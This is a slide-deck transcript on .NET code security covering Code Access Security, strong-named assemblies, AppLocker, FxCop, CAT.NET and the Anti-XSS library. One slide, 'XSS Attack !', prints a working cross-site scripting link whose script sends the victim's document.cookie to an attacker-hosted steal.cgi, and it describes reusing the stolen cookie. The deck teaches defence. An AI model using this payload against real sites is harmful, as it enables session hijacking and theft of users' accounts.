Transcript .NET Code security including 4.0 & Tools Jon C. Arce [email protected] Agenda Available Tools .NET Code Access Security FxCop CAT.NET .NET Framework Security Features Code Access Security Role-Based Security Cryptography Securing ASP.NET.

.NET Code security
including 4.0 & Tools
Jon C. Arce
[email protected]
Agenda
Available Tools
.NET Code Access Security
FxCop
CAT.NET
.NET Framework Security Features
Code Access Security
Role-Based Security
Cryptography
Securing ASP.NET Web Applications
Securing ASP.NET Web Services
.NET Code Access Security (CAS)
Policy
Code Access Security (CAS) is the .NET
Common Language Runtime (CLR) mechanism
for maintaining security based on the identity of
code.
You need to sign the code, to add EXTERNAL
configuration security to the application.
Strong-Named Assemblies
Strong names are
Unique identifiers (containing a public key)
Used to digitally sign assemblies
sn –k MyFullKey.snk
Strong-named assemblies
Prevent tampering
Confirm the identity of the assembly’s
publisher
Allow side-by-side components
Evidence-Based Security
Evidence
Is assessed when an assembly is loaded
Is used to determine the permissions for the
assembly
Can include the assembly’s:
Strong name information
URL
Zone
Authenticode signature
Security Policies (up to .NET 2.0)
Security Entity
Description
Policy
Is set by administrators
Is enforced at runtime
Simplifies administration
Contains permissions
Contains code groups
Code Group
Associates similar components
Is evidence based
Is linked to permission set(s)
Permission Set
Is a set of granted permissions
Permission Sets
Types of Security Checks
Imperative security checks
Create Permission objects
Call Permission methods
Declarative security checks
Use Permission attributes
Apply to methods or classes
Overriding security checks
Use the Assert method
Prevent the stack walk
Security Check Stack Walks
Call Stack
1. An assembly requests access
to a method in your assembly
SomeAssembly
2. Your assembly passes the
request to a .NET Framework
assembly
Grant: Execute
Call to ReadFile
3. The security system ensures
that all callers in the stack have
the required permissions
YourAssembly
Grant: ReadFile
Call to ReadFile
Permission Demand
.NET Framework
Assembly
Grant: ReadFile
4. The security system grants
access or throws an exception
Security System
Security exception
Grant access?
Access denied
Permission Requests
Used by developers to state required
permissions
Implemented by attributes
Prevents an assembly from loading when
minimum permissions are not available
//I will only run if I can call unmanaged code
[assembly:SecurityPermission
(SecurityAction.RequestMinimum,
UnmanagedCode=true)]
Create a code group
•
Control Panel
Specify Membership Condition
•
Specify Membership Condition
Select a permission set
Naming the permission set
Assign permission sets
Setting File I/O permissions
Completing Code Group Creation
Security Policy in the v4 CLR
In previous releases of the .NET Framework,
CAS policy applied to all assemblies loaded into
an application
the major areas that are seeing updates with
the v4 CLR are:
Security policy
Security transparency
APTCA (AllowPartiallyTrustedCallersAttribute)
Evidence
AppDomain Managers
http://blogs.msdn.com/shawnfa/archive/2009/05/20/net-4-0security.aspx
Sandboxing Privileged Code
Permissions Demanded then Asserted
AllowPartiallyTrustedCallers attribute added
Assembly installed into the global assembly cache
Resource
Access
Partial Trust Web
Application
Wrapper Assembly
<trust level_”Medium”
originUri_--/>
Sandboxed Code
Secured
Resource
Evidence Types
Evidence
Description
Application directory
The application's installation
directory.
Cryptographic hash as SHA1.
Software publisher signature;
that is, the Authenticode signer
of the code.
Site of origin, such as
http://www.microsoft.com.
Hash
Publisher
Site
Strong name
Cryptographically strong name of
the assembly.
URL
URL of origin.
Zone
origin such as Internet Zone.
AppDomain Managers
In .NET, the basic unit of execution is NOT the
process, rather it is that of the Application
Domain.
With AppDomains, multiple applications can run
in the same process, thereby sharing the .NET
runtime libraries.
HostSecurityManager class apply policy and
permissions. This technique determines the
security for the entire AppDomain at once.
Software Restriction Policy
You can use software restriction policies to
identify software and to control its ability to run
on your local computer, organizational unit,
domain, or site.
Control the ability of software to run on your
system.
Permit users to run only specific files on
multiuser computers.
Control whether software restriction policies
affect all users or just certain users on a
computer.
Cancel an application to run (virus)
New Software Restriction Policies
1. Sign the application
2. Set the publisher
•
Publish -> Options
Windows Application Locker
AppLocker is a new feature in Windows 7 and
Windows Server 2008 R2 that allows you to
specify which users or groups can run particular
applications in your organization based on
unique identities of files.
If you use AppLocker, you can create rules to
allow or deny applications from running like:
executable files (.exe and .com), scripts (.js, .ps1,
.vbs, .cmd, and .bat), Windows Installer files (.msi
and .msp), and DLL files (.dll and .ocx)
Isolated Storage
Provides a virtual file system
Allows quotas
Implements file system isolation
based on:
Application identity
User identity
IsolatedStorageFile isoStore =
IsolatedStorageFile.GetUserStoreForAssembly();
TOOLS TO HELP WITH SECURITY
FXCop
•
FxCop is a code analysis tool that checks .NET
managed code assemblies for conformance to
the Microsoft .NET Framework Design
Guidelines. It inspect assemblies for more than
200 defects in the following areas:
•
•
•
•
•
•
•
Library design
Globalization
Naming conventions
Performance
Interoperability and portability
Security
Usage
FxCop demo
Microsoft Code Analysis Tool .NET
CAT.NET is a static code analysis tool like
fxCop but specially built for managed code
and with a strong focus on security
vulnerabilities.
CAT.NET scans manage code for specific
security vulnerabilities like:
SQL injection
LDAP injection
Cross Site Scripting
XPATH injection
and many other categories of vulnarabilities.
CAT.NET demo
Cross Site Scripting
XSS stands for Cross Site Scripting, an XSS attack is
when an attacker manages to inject Java script code or
sometimes other code (usually Java Script) into a
website causing it to execute the code.
if an attacker made a specially crafted link and sent it
to an unsuspecting victim and that victim clicked the
link and a piece of Java Script code could be executed
which would send the victims cookie away to a CGI
Script
Cross-site scripting carried out on websites were
roughly 80% of all documented security
vulnerabilities as of 2007
XSS Attack !
Send the victim and email, with the following HTML:
<AHREF="http://archives.cnn.com/2001/US/09/16/inv.binladen.denial/?tw=<scr
ipt>document.location.replace('http://freewebhost.com/ph33r/steal.cgi?'+doc
ument.cookie);</script>">Check this Article Out! </a>
The user would of course click the link and they would
be lead to the CNN News Article, but at the same time
the attacker would of been able to also direct the user
towards his specially crafted URL, he now has the
users cookie.
Using the Firefox cookie editor the attacker copies and
pastes the victims cookie and uses it for himself.
Microsoft Anti-Cross Site Scripting
Library V3.0
The Microsoft Anti-Cross Site Scripting Library
V3.0 (Anti-XSS V3.0) is an encoding library
designed to help developers protect their
ASP.NET web-based applications from XSS
attacks.
It differs from most encoding libraries in that it
uses the white-listing technique -- sometimes
referred to as the principle of inclusions -- to
provide protection against XSS attacks.
http://www.microsoft.com/downloads/details.aspx?familyid=05
1EE83C-5CCF-48ED-8463-02F56A6BFC09&displaylang=en
Session Summary
.NET Framework Security Features
Code Access Security
Role-Based Security
Cryptography
Securing ASP.NET Web Applications
Securing ASP.NET Web Services
Next Steps
1.
Stay informed about security

Sign up for security bulletins:
http://www.microsoft.com/security/security_bulletins/alerts2.asp

Get the latest Microsoft security guidance:
http://www.microsoft.com/security/guidance/
2.
Get additional security training

Find online and in-person training seminars:
http://www.microsoft.com/seminar/events/security.mspx

Find a local CTEC for hands-on training:
http://www.microsoft.com/learning/
For More Information
Microsoft Security Site (all audiences)
http://www.microsoft.com/security
MSDN Security Site (developers)
http://msdn.microsoft.com/security
TechNet Security Site (IT professionals)
http://www.microsoft.com/technet/security
Questions and Answers